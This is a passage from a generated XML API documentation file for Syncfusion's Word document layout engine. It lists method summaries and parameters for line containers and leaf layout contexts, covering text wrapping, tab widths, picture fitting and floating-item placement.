        <member name="M:Syncfusion.Layouting.LCLineContainer.MarkAsFitted(Syncfusion.Layouting.LayoutContext)">
            <summary>
            Commits for fitted.
            </summary>
            <param name="childContext">The child context.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCLineContainer.MarkAsSplitted(Syncfusion.Layouting.LayoutContext)">
            <summary>
            Commits for splitted.
            </summary>
            <param name="childContext">The child context.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCLineContainer.UpdateClientArea">
            <summary>
            Updates the client area.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LCLineContainer.ChangeChildsAlignment">
            <summary>
            Changes the childs alignment.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LCLineContainer.GetLastTabWidth(Syncfusion.DocIO.DLS.WParagraphFormat,System.Int32)">
            <summary>
            Gets the last tab width.
            </summary>
            <param name="paraFormat">Paragraph format</param>
            <param name="tabsCount">Tabs count</param>
            <returns>Tab width</returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCLineContainer.SplitLineBasedOnInterSectingFlotingEntity(Syncfusion.Layouting.LayoutedWidget,System.Drawing.RectangleF@,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Splits the line based on inter secting floting entity.
            </summary>
            <param name="m_backupWidget">The m_backup widget.</param>
            <param name="interSectingFloattingItem">The inter secting floatting item.</param>
            <param name="m_resulttedWidgt">The m_resultted widgt.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCLineContainer.GetFirstInlineItemIndex(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Gets the first index of the inline item.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCLineContainer.InterSectingFloattingItem(System.Drawing.RectangleF)">
            <summary>
            Inters the secting floatting item.
            </summary>
            <param name="rect">The rect.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCLineContainer.RemoveSplitStringWidget(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Remove split string widgets from the widget collection
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LCLineContainer.UpdateSubWidthBasedOnTextWrap(Syncfusion.DocIO.DLS.WParagraph,System.Double@,System.Single)">
            <summary>
            Updates sub width based on the Text wrap
            </summary>
            <param name="subWidth"></param>
        </member>
        <member name="M:Syncfusion.Layouting.LCLineContainer.UpdateHorizontalAlignment(System.Int16)">
            <summary>
            Updates the horizontal alignment.
            </summary>
            <param name="xAlginment">The x alginment.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LCLineContainer.GetParagraph">
            <summary>
            Gets the paragraph.
            </summary>
            <param name="widget">The widget.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCLineContainer.IsTOC(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Checks the paragraph for TOC
            </summary>
            <param name="txtRange">paragraph</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCLineContainer.DoLayoutAfter">
            <summary>
            Does the layout after.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LCLineContainer.IsTOCNeedNotToBeUpdated(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.Layouting.SplitWidgetContainer)">
            <summary>
            Determines whether the toc need not to be updated or not. 
            </summary>
            <param name="paragraph">The paragraph.</param>
            <param name="swc">The SWC.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCLineContainer.GetValidParaItemIndex(Syncfusion.DocIO.DLS.WParagraph,System.Int32)">
            <summary>
            Gets the index of the valid para item.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LCLineContainer.UpdateTOCPageNumber(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Updates the TOC page number.
            </summary>
            <param name="para">The para.</param>
        </member>
        <member name="T:Syncfusion.Layouting.LeafLayoutContext">
            <summary>
            Represents the layout context for layouting text.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.#ctor(Syncfusion.Layouting.ILeafWidget,Syncfusion.Layouting.ILCOperator)">
            <summary>
            Initializes a new instance of the <see cref="!:LCLeaf"/> class.
            </summary>
            <param name="strWidget">The STR widget.</param>
            <param name="lcOperator">The lc operator.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.Layout(System.Drawing.RectangleF)">
            <summary>
            Layouts the specified widget.
            </summary>
            <param name="rect">The rect.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsBookmarkNeedToSplit(Syncfusion.Layouting.ILeafWidget)">
            <summary>
            Need to split the entire paragarph after the Bookmarks
            </summary>
            <param name="leafWidget"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.UpdatePictureBorderSize(Syncfusion.DocIO.DLS.WPicture,System.Drawing.SizeF@)">
            <summary>
            Update the picture width and height based on the picture border lineWidth
            </summary>
            <param name="picture"></param>
            <param name="size"></param>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsFloatingItemLayouted(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Determines whether the current floating item already layouted or not.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsDynamicRelayoutingOccur(Syncfusion.DocIO.DLS.WParagraph,System.Int32)">
            <summary>
            Determines whether the dynamic relayouting occur or not.
            </summary>
            <param name="paragraph">The paragraph.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsFloatingItemExistInCollection(System.Int32@)">
            <summary>
            Determines whether the floating item exist in the floating item collections.
            </summary>
            <param name="i">i.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.CreateLayoutedWidget(System.Int32)">
            <summary>
            Creates the layouted widget.
            </summary>
            <param name="i">The i.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.SetBoundsForLayoutedWidget(System.Drawing.RectangleF,System.Single,System.Single,System.Single,System.Single)">
            <summary>
            Sets the bounds for layouted widget.
            </summary>
            <param name="textWrappingBounds">The text wrapping bounds.</param>
            <param name="distanceFromLeft">The distance from left.</param>
            <param name="distanceFromTop">The distance from top.</param>
            <param name="distanceFromRight">The distance from right.</param>
            <param name="distanceFromBottom">The distance from bottom.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.LayoutShapeTextBody">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.LayoutTextBoxBody">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.UpdateLayoutedWidgetBasedOnVerticalAlignment(System.Drawing.RectangleF,Syncfusion.Layouting.LayoutedWidget,Syncfusion.DocIO.DLS.VerticalAlignment)">
            <summary>
            
            </summary>
            <param name="ltWidget"></param>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.UpdateShapeBoundsToLayoutTextBody(System.Drawing.RectangleF@,Syncfusion.DocIO.DLS.InternalMargin)">
            <summary>
            
            </summary>
            <param name="layoutRect"></param>
            <param name="textBox"></param>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.GetBoundsToLayoutShapeTextBody(Syncfusion.DocIO.DLS.Shape,System.Drawing.RectangleF)">
            <summary>
            
            </summary>
            <param name="shape"></param>
            <param name="bounds"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.GetCurrTextRange">
            <summary>
            Get Current TextRange of the leafWidget
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.UpdateTabWidth(System.Drawing.RectangleF@,System.Drawing.SizeF@)">
            <summary>
            Update Tab Width.
            </summary>
            <param name="rect">The rect.</param>
            <param name="size">The size.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.UpdateAreaMaxWidth">
            <summary>
            Update the client area width if exceeds tab position exceeds the client area width
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.ClientAreaRight(Syncfusion.DocIO.DLS.WParagraph,System.Single)">
            <summary>
            Clients the area right.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <param name="rectRight">The rect right.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.GetPageMarginLeft">
            <summary>
            Get Left Margin of the Page
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.GetPageMarginRight">
            <summary>
            Get Right Margin of the Page
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.UpdateLeafWidgetPosition(System.Drawing.RectangleF@,System.Single@,System.Single)">
            <summary>
            Update xPosition of the LeafWidget which have Previous Tab justification is Decimal
            </summary>
            <param name="rect"></param>
            <param name="xPosition"></param>
            <param name="width"></param>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsLeafWidgetNeedToBeSplitted(System.Drawing.SizeF,System.Single)">
            <summary>
            Determines whether leaf widget is need to be splitted
            </summary>
            <param name="size">size</param>
            <param name="rect">rect</param>
            <returns>
            	<c>true</c> if leaf widget need to be splitted, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.TryFit(System.Drawing.SizeF)">
            <summary>
            
            </summary>
            <param name="s"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsNeedToFitItemOfLastParagraph">
            <summary>
            Determine whether need to fit item of the last paragraph
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsTextContainsLineBreakCharacters">
            <summary>
            Determines whether text contains line break characters.
            </summary>
            <returns>
            	<c>true</c> if text contains line break characters; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsClipped(System.Drawing.SizeF)">
            <summary>
            Determines whether the specified leaf widget is to be clipped or not.
            </summary>
            <param name="size">The size.</param>
            <returns>
            	<c>true</c> if the specified leaf widget is to be clipped; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsParagraphItemNeedToFit(Syncfusion.DocIO.DLS.ParagraphItem)">
            <summary>
            Determine whether the paragraph Item is need to Fit
            </summary>
            <param name="paraItem"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.GetPararaphLeftIndent">
            <summary>
            Get's Left Indent of the paragraph
            </summary>
            <param name="paragraph"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsPictureFit(System.Drawing.SizeF,System.Single)">
            <summary>
            Determines whether Picture Fit
            </summary>
            <param name="size">size</param>
            <returns>
            	<c>true</c> if Picture Fit, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.GetLineSpacing(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Gets the line spacing value.
            </summary>
            <param name="lineSpacingRule">The line spacing rule.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsFitPictureInSection(System.Single,System.Single,System.Single,System.Single,System.Drawing.SizeF,System.Single,Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Determines whether the picture is fit picture in section.
            </summary>
            <param name="columnWidth">Width of the column.</param>
            <param name="picHeight">Height of the pic.</param>
            <param name="pageHeight">Height of the page.</param>
            <param name="topMargin">The top margin.</param>
            <param name="size">The size.</param>
            <param name="clientActiveAreaWidth">Width of the client active area.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsFitPictureInTextBox(System.Single,System.Drawing.SizeF,System.Single,Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Determines whether the picture is fit picture in Textbox.
            </summary>
            <param name="topMargin">The top margin.</param>
            <param name="size">The size.</param>
            <param name="picHeight">Height of the pic.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsFitPictureInTable(System.Single,System.Single,System.Single,System.Single,System.Drawing.SizeF,Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Determines whether the picture is fit picture in table.
            </summary>
            <param name="cellWidth">Width of the cell.</param>
            <param name="cellTopMargin">The cell top margin.</param>
            <param name="topMargin">The top margin.</param>
            <param name="picHeight">Height of the pic.</param>
            <param name="size">The size.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsFitPictureInHeaderFooter(System.Single,System.Single,System.Single,System.Drawing.SizeF,System.Single,System.Single,Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Determines whether the picture is fit picture in headerfooter.
            </summary>
            <param name="picHeight">Height of the pic.</param>
            <param name="pageHeight">Height of the page.</param>
            <param name="topMargin">The top margin.</param>
            <param name="size">The size.</param>
            <param name="columnWidth">Width of the column.</param>
            <param name="clientActiveAreaWidth">Width of the client active area.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsFloatingItemFit(Syncfusion.DocIO.DLS.Entity,System.Drawing.SizeF,Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.ParagraphItem,System.Single,System.Single)">
            <summary>
            Determines whether [is floating item fit] [the specified ent].
            </summary>
            <param name="ent">The ent.</param>
            <param name="size">The size.</param>
            <param name="ownerParagraph">The owner paragraph.</param>
            <param name="paraItem">The para item.</param>
            <param name="pageHeight">Height of the page.</param>
            <param name="topMargin">The top margin.</param>
            <param name="isPictureFit">if set to <c>true</c> [is picture fit].</param>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.GetEmptyTextRangeHeight">
            <summary>
            Get the empty TextRange height
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.GetBaseEntity(Syncfusion.DocIO.DLS.ParagraphItem,Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Get Base Entity.
            </summary>
            <param name="entity">The entity.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsTextRangeFitInClientActiveArea(System.Drawing.SizeF)">
            <summary>
            Determines whether TextRange Fit in ClientActiveArea
            </summary>
            <param name="size">size</param>
            <returns>
            	<c>true</c> if TextRange Fit in ClientActiveArea, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsTextRangeNeedToFit">
            <summary>
            Determine whether the text range is need to fit
            </summary>
            <returns>
            <c>true</c> if previous tab position is greater than the ClientActiveArea, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.WordLayout(System.Drawing.RectangleF,System.Drawing.SizeF,Syncfusion.DocIO.DLS.WTextRange)">
            <summary>
            Layout for Word 
            </summary>
            <param name="rect">The rect</param>
            <param name="size">size</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.SplitUnicodeTextByWord(Syncfusion.DocIO.DLS.WTextRange,System.Drawing.RectangleF,System.Drawing.SizeF,System.Single)">
            <summary>
            Word by word layouting for Unicode text
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsUnicodeTextNeedToBeSplittedByWord(System.Drawing.SizeF,System.Drawing.RectangleF,Syncfusion.DocIO.DLS.WTextRange,System.Single)">
            <summary>
            Check whether the text need to splitted by word
            </summary>
            <param name="size"></param>
            <param name="rect"></param>
            <param name="nextSiblingText"></param>
            <param name="sizeNextWidth"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.GetText">
            <summary>
            Get Text Whether the LeafWidget is WTextRange or SplitStringWidget
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsTextNeedToBeSplittedByWord(System.Drawing.SizeF,System.Drawing.RectangleF,Syncfusion.Layouting.IWidget,System.Single)">
            <summary>
            Check whether the text need to splitted by word
            </summary>
            <param name="size"></param>
            <param name="rect"></param>
            <param name="nextSiblingText"></param>
            <param name="sizeNextWidth"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.GetWidthToFitText(Syncfusion.DocIO.DLS.WTextRange,System.Single)">
            <summary>
            Get width to fit text in current line
            </summary>
            <param name="textRange"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.GetNextTextRangeWidth(Syncfusion.Layouting.IWidget,System.String@,System.Drawing.SizeF,System.Drawing.RectangleF)">
            <summary>
            Get Next TextRanges width
            </summary>
            <param name="nextSiblingText"></param>
            <param name="size"></param>
            <param name="rect"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.GetUnicodeNextTextRangeWidth(Syncfusion.DocIO.DLS.WTextRange,System.String@,System.Drawing.SizeF,System.Drawing.RectangleF)">
            <summary>
            Get Next TextRanges width
            </summary>
            <param name="nextSiblingText"></param>
            <param name="size"></param>
            <param name="rect"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsNextSibligSizeNeedToBeMeasure(System.Drawing.SizeF@,Syncfusion.Layouting.IWidget,System.Drawing.RectangleF,System.Drawing.SizeF)">
            <summary>
            Determine Whether the Nextsibling Textrange size is need to measure
            </summary>
            <param name="sizeNext"></param>
            <param name="nextSiblingTextRange"></param>
            <param name="rect"></param>
            <param name="size"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsUnicodeNextSibligSizeNeedToBeMeasure(System.Drawing.SizeF@,Syncfusion.DocIO.DLS.WTextRange,System.Drawing.RectangleF,System.Drawing.SizeF)">
            <summary>
            Determine Whether the Nextsibling Textrange size is need to measure
            </summary>
            <param name="sizeNext"></param>
            <param name="nextSiblingTextRange"></param>
            <param name="rect"></param>
            <param name="size"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsBeginCJKCharacter(System.String,System.Int32@)">
            <summary>
            Determine whether the text contain CJK begin characters
            </summary>
            <param name="text"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.GetNextSibling(Syncfusion.DocIO.DLS.WTextRange)">
            <summary>
            Get Next text range
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsLeafWidgetIsInCell(Syncfusion.DocIO.DLS.ParagraphItem)">
            <summary>
            Determines whether leaf widget is in cell
            </summary>
            <returns>
            	<c>true</c> if leaf widget is in cell, set to <c>true</c>.
            </returns>
        </member>
        <!-- Badly formed XML comment ignored for member "M:Syncfusion.Layouting.LeafLayoutContext.IsLeafWidgetIsInTextBox(Syncfusion.DocIO.DLS.ParagraphItem)" -->
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsLeafWidgetNextSiblingIsTextRange(Syncfusion.DocIO.DLS.WTextRange)">
            <summary>
            Determines whether next sibling of leaf widget is text range.
            </summary>
            <returns>
            	<c>true</c> if next sibling of leaf widget is text range, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.SplitByWord(Syncfusion.Layouting.ISplitLeafWidget,System.Drawing.SizeF,Syncfusion.DocIO.DLS.WTextRange,System.Single,System.Boolean)">
            <summary>
            Split by Word
            </summary>
            <param name="splitLeafWidget">SplitLeafWidget</param>
            <param name="size">Size</param>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsTextNeedToBeSplitted(System.Drawing.SizeF,System.Drawing.RectangleF,Syncfusion.DocIO.DLS.WTextRange)">
            <summary>
            Determines whether text is need to be splitted
            </summary>
            <param name="size">size</param>
            <param name="rect">rect</param>
            <returns>
            	<c>true</c> if text need to be splitted, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsTextNeedToBeSplitted(Syncfusion.DocIO.DLS.WTextRange,Syncfusion.DocIO.DLS.WTextRange)">
            <summary>
            Determines whether text is need to be splitted
            </summary>
            <returns>
            	<c>true</c> if text need to be splitted, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.GetOwnerParagraph">
            <summary>
            Get OwnerParagraph of the LeafWidget
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.CheckWrappingStyleForWrapping(Syncfusion.DocIO.DLS.TextWrappingStyle)">
            <summary>
            Checks the wrapping style for wrapping.
            </summary>
            <param name="textWrappingStyle">The text wrapping style.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsNeedToWrapLeafWidget(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.Layouting.Layouter)">
            <summary>
            Determines whether the leafWidget based on the wrapping element. 
            </summary>
            <param name="ownerPara">The owner para.</param>
            <param name="layouter">The layouter.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsNeedToWrapParaMarkToRightSide(Syncfusion.DocIO.DLS.WParagraph,System.Drawing.RectangleF,System.Single,Syncfusion.Layouting.Layouter,System.Drawing.RectangleF,Syncfusion.DocIO.DLS.TextWrappingType,System.Single)">
            <summary>
            Determines whether the paragraph mark move to right side of the intersecting of floating item. 
            </summary>
            <param name="ownerPara">The owner para.</param>
            <param name="textWrappingBounds">The text wrapping bounds.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsNeedToWrapForSquareTightAndThrough(Syncfusion.Layouting.Layouter,System.Int32,System.Int32,Syncfusion.DocIO.DLS.TextWrappingStyle,System.Drawing.RectangleF,System.Boolean,System.Int32,Syncfusion.DocIO.DLS.Entity,System.Boolean,System.Drawing.RectangleF,System.Drawing.SizeF)">
            <summary>
            Determines whether the leafWidget based on the wrapping element for square, tight and through. 
            </summary>
            <param name="layouter">The layouter.</param>
            <param name="wrapOwnerIndex">Index of the wrap owner.</param>
            <param name="wrapItemIndex">Index of the wrap item.</param>
            <param name="textWrappingStyle">The text wrapping style.</param>
            <param name="textWrappingStyle">The text wrapping bounds.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsNeedToWrapForTopAndBottom(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.Layouting.Layouter,System.Int32,System.Int32,Syncfusion.DocIO.DLS.TextWrappingStyle,System.Drawing.RectangleF,System.Boolean,System.Int32,Syncfusion.DocIO.DLS.Entity,System.Boolean,System.Drawing.RectangleF,System.Drawing.SizeF)">
            <summary>
            Determines whether the leafWidget based on the wrapping element for top and bottom wrapping type. 
            </summary>
            <param name="layouter">The layouter.</param>
            <param name="wrapOwnerIndex">Index of the wrap owner.</param>
            <param name="wrapItemIndex">Index of the wrap item.</param>
            <param name="textWrappingStyle">The text wrapping style.</param>
            <param name="textWrappingStyle">The text wrapping bounds.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsNeedDoIntermediateWrapping(System.Single,Syncfusion.DocIO.DLS.TextWrappingStyle,Syncfusion.Layouting.Layouter,Syncfusion.DocIO.DLS.TextWrappingType,System.Drawing.RectangleF,System.Drawing.SizeF,Syncfusion.Layouting.ParagraphLayoutInfo,System.Boolean,System.Drawing.RectangleF,Syncfusion.Layouting.ILeafWidget,System.Single,System.Single)">
            <summary>
            Is need to intermediate the leaf widget based on the floating item.
            </summary>
            <param name="remainingClientWidth">Width of the remaining client.</param>
            <param name="textWrappingStyle">The text wrapping style.</param>
            <param name="layouter">The layouter.</param>
            <param name="textWrappingType">Type of the text wrapping.</param>
            <param name="rect">The rect.</param>
            <param name="size">The size.</param>
            <param name="paragraphLayoutInfo">The paragraph layout information.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.AdjustClientAreaBasedOnTextWrap(Syncfusion.Layouting.ILeafWidget,System.Drawing.SizeF@,System.Drawing.RectangleF@)">
            <summary>
            Adjust Client Area for Text Wrapping
            </summary>
            <param name="leafWidget">leaf widget</param>
            <param name="size">Size</param>
            <param name="rect">The rect</param>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsTextFitBelow(System.Drawing.RectangleF,System.Single,Syncfusion.DocIO.DLS.Entity)">
            <summary>
            To identify the text fit below or above the textbox/shape
            </summary>
            <param name="wrappingBounds">Floating item wrapping bounds</param>
            <param name="textHeight">Current leafwidget Y position </param>
            <param name="entity">Floating entity</param>
            <returns><c>true</c>when text fit below, otherwise <c>false</c></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.GetTopMarginValueForFloatingTable(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.Entity,System.Single)">
            <summary>
            Gets the top margin value for floating table.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <param name="floatingEntity">The floating entity.</param>
            <param name="yPosition">The y position.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.AdjustClientAreaBasedOnExceededTab(Syncfusion.Layouting.ILeafWidget,System.Drawing.SizeF,System.Drawing.RectangleF@,Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Adjusts the client area based on exceeded tab.
            </summary>
            <param name="leafWidget">The leaf widget.</param>
            <param name="size">The size.</param>
            <param name="rect">The rect.</param>
            <param name="leftIndent">The left indent.</param>
            <param name="paragraph">The paragraph.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.GetMinWidth(Syncfusion.DocIO.DLS.WTextRange,System.Drawing.SizeF,System.Drawing.RectangleF)">
            <summary>
            Get Minium width of the word
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsLeafWidgetOwnerIsTextBox">
            <summary>
            Check whether the leafwidget owner is textbox or not
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.DoLayoutAfter">
            <summary>
            Does the layout after.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.FitWidget(System.Drawing.SizeF,Syncfusion.Layouting.IWidget,System.Boolean,System.Single,System.Single)">
            <summary>
            Fits the widget.
            </summary>
            <param name="size">The size.</param>
            <param name="widget">The widget.</param>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.GetFloattingItemPosition(System.Single@,System.Single@,System.Drawing.SizeF@)">
            <summary>
            Gets the floatting item position.
            </summary>
            <param name="indentX">The indent x.</param>
            <param name="indentY">The indent y.</param>
            <param name="size">The size.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.GetRightMarginHorizPosition(System.Single,System.Single,Syncfusion.DocIO.ShapeHorizontalAlignment,System.Single,System.Single,Syncfusion.DocIO.DLS.TextWrappingStyle)">
            <summary>
            
            </summary>
            <param name="pageWidth"></param>
            <param name="rightMargin"></param>
            <param name="horzAlignment"></param>
            <param name="horzPosition"></param>
            <param name="shapeWidth"></param>
            <param name="textWrapStyle"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsParagraphContainingLineBreakInFirst(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Determines whether [is paragraph containing line break] [the specified paragraph].
            </summary>
            <param name="paragraph">The paragraph.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.GetLeftMarginHorizPosition(System.Single,Syncfusion.DocIO.ShapeHorizontalAlignment,System.Single,System.Single,Syncfusion.DocIO.DLS.TextWrappingStyle)">
            <summary>
            
            </summary>
            <param name="leftMargin"></param>
            <param name="horzAlignment"></param>
            <param name="horzPosition"></param>
            <param name="shapeWidth"></param>
            <param name="textWrapStyle"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsFitLeafWidgetInContainerHeight(Syncfusion.DocIO.DLS.ParagraphItem,System.Boolean,System.Boolean,Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Checks whether layout in cell property is true and object should be fit within the container height.
            </summary>
            <param name="paraItem"></param>
            <param name="isInCell">If set to <see langword="true"/>, then ; otherwise, .</param>
            <param name="isInTextBox">If set to <see langword="true"/>, then ; otherwise, .</param>
            <returns></returns>
            <remarks></remarks>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.IsFitLeafWidgetInContainer(Syncfusion.DocIO.DLS.ParagraphItem,System.Boolean)">
            <summary>
            Checks whether layout in cell property is true and object should be fit within the container height.
            </summary>
            <param name="paraItem">The para item.</param>
            <param name="isWord2013">if set to <c>true</c> [is word2013].</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.GetVerticalPosition(Syncfusion.DocIO.DLS.ParagraphItem,System.Single,Syncfusion.DocIO.DLS.VerticalOrigin,Syncfusion.DocIO.DLS.TextWrappingStyle)">
            <summary>
            Get vertical position of the picture
            </summary>
            <param name="picture"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.LeafLayoutContext.GetHorizontalPosition(System.Drawing.SizeF,Syncfusion.DocIO.DLS.ParagraphItem,Syncfusion.DocIO.ShapeHorizontalAlignment,Syncfusion.DocIO.DLS.HorizontalOrigin,System.Single,Syncfusion.DocIO.DLS.TextWrappingStyle)">
            <summary>
            Get Horizontal position of the picture
            </summary>
            <param name="picture"></param>
            <returns></returns>
        </member>
